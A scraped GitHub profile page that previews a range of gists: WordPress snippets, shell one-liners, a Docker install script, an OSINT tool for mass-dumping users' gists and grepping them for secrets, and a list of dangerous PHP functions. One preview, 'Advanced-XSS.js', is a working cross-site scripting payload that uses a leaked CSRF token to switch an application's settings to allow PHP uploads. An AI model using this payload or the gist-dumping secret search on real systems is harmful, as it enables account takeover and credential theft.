Skip to content

Instantly share code, notes, and snippets.

View robertdevore's full-sized avatar
🐺
#LoneWolfLifestyle

Robert DeVore robertdevore

🐺
#LoneWolfLifestyle
View GitHub Profile
@nil0x42
nil0x42 / gist-massdump.py
Last active June 21, 2023 02:43
[OSINT] Dump ALL gists from a list of GitHub users
#!/usr/bin/env python3
#author: @nil0x42
# Usage:
# $ export GITHUB_TOKEN="<YOUR GITHUB TOKEN>"
# $ cat github-users.txt | ./gist-massdump.py
# $ grep -r 'someSecret' gist-massdump.out/
import sys, os, requests, json, pathlib
if sys.stdin.isatty():
@johnnypea
johnnypea / useful-one-liners.sh
Last active July 16, 2024 02:05
Useful one liners
# Run the last command as root
sudo !!
# Serve current directory tree at http://$HOSTNAME:8000/
python -m SimpleHTTPServer
# Save a file you edited in vim without the needed permissions
:w !sudo tee %
# change to the previous working directory
cd -
# Runs previous command but replacing
^foo^bar
@amriunix
amriunix / Advanced-XSS.js
Last active July 14, 2023 09:41
Some XSS payload for File Upload, leaking CSRF tokens, updating data and triggering files
function updateConfig(csrf) {
xhr = new XMLHttpRequest();
xhr.open('POST', '/application/vulnerable/to/fileUpload/settings', true);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
configPayload = 'save=1&user=admin&allowFileUpload=php&csrf=' + csrf;
xhr.send(configPayload);
}
function getCSRF() {
@hmowais
hmowais / plugin-functions.php
Created October 28, 2019 08:06
Modify Plugin Function in Theme Functions.php
public function enqueue_scripts() {
// Empty redirect.
$redirect_fail = '';
// Set the redirect URL.
$redirectOnFail = esc_url( apply_filters( 'avwp_redirect_on_fail_link', $redirect_fail ) );
}
@nuga99
nuga99 / docker-install-parrot.sh
Last active April 29, 2024 19:18
Install Docker Engine on Parrot OS (2023)
#!/bin/sh
# From https://www.hiroom2.com/2017/09/24/parrotsec-3-8-docker-engine-en/
# Changelog:
# @DavoedM: Apr 3, 2020
# @C922A10971734: Jan 19, 2023
set -e
# Install dependencies.
@grugq
grugq / ppw
Last active July 14, 2022 05:54
passphrase generator using cmdline tools because wtf not
#!/bin/bash
#
# simplistic program that creates passphrases using bash. the passphrases
# are a Number of '-' separated words, ea. of max Chars, with limited post
# processing (upper case, lower case, 1337.)
#
# (c) 2019, thaddeus t. grugq <the.grugq@gmail.com>
#
CRACKLIB=/usr/share/dict/cracklib-small
@djrmom
djrmom / custom-hooks.php
Created October 29, 2018 21:10
facetwp conditional scroll to top only on pager
<?php
/** scoll on loaded only if pager is the change in facet **/
add_action( 'wp_head', function() { ?>
<script>
(function($) {
$(document).on('facetwp-refresh', function() {
if ( FWP.soft_refresh == true ) {
FWP.enable_scroll = true;
@matzeeable
matzeeable / is_rest.php
Last active February 22, 2024 20:20
Checks if the current request is a WP REST API request.
<?php
if ( !function_exists( 'is_rest' ) ) {
/**
* Checks if the current request is a WP REST API request.
*
* Case #1: After WP_REST_Request initialisation
* Case #2: Support "plain" permalink settings and check if `rest_route` starts with `/`
* Case #3: It can happen that WP_Rewrite is not yet initialized,
* so do this (wp-settings.php)
@mccabe615
mccabe615 / firefox_settings.md
Last active December 7, 2022 23:45
Firefox settings for testing

In about:config in Firefox, all of the below should be set to false

  • network.captive-portal-service.enabled
  • extensions.getAddons.cache.enabled
  • network.prefetch-next
  • browser.newtabpage.enabled
  • toolkit.telemetry.archive.enabled = false
  • toolkit.telemetry.enabled = false
  • toolkit.telemetry.rejected = true
@mccabe615
mccabe615 / phpdangerousfuncs.md
Last active July 17, 2024 15:30
Dangerous PHP Functions

Command Execution

exec           - Returns last line of commands output
passthru       - Passes commands output directly to the browser
system         - Passes commands output directly to the browser and returns last line
shell_exec     - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec - Executes a program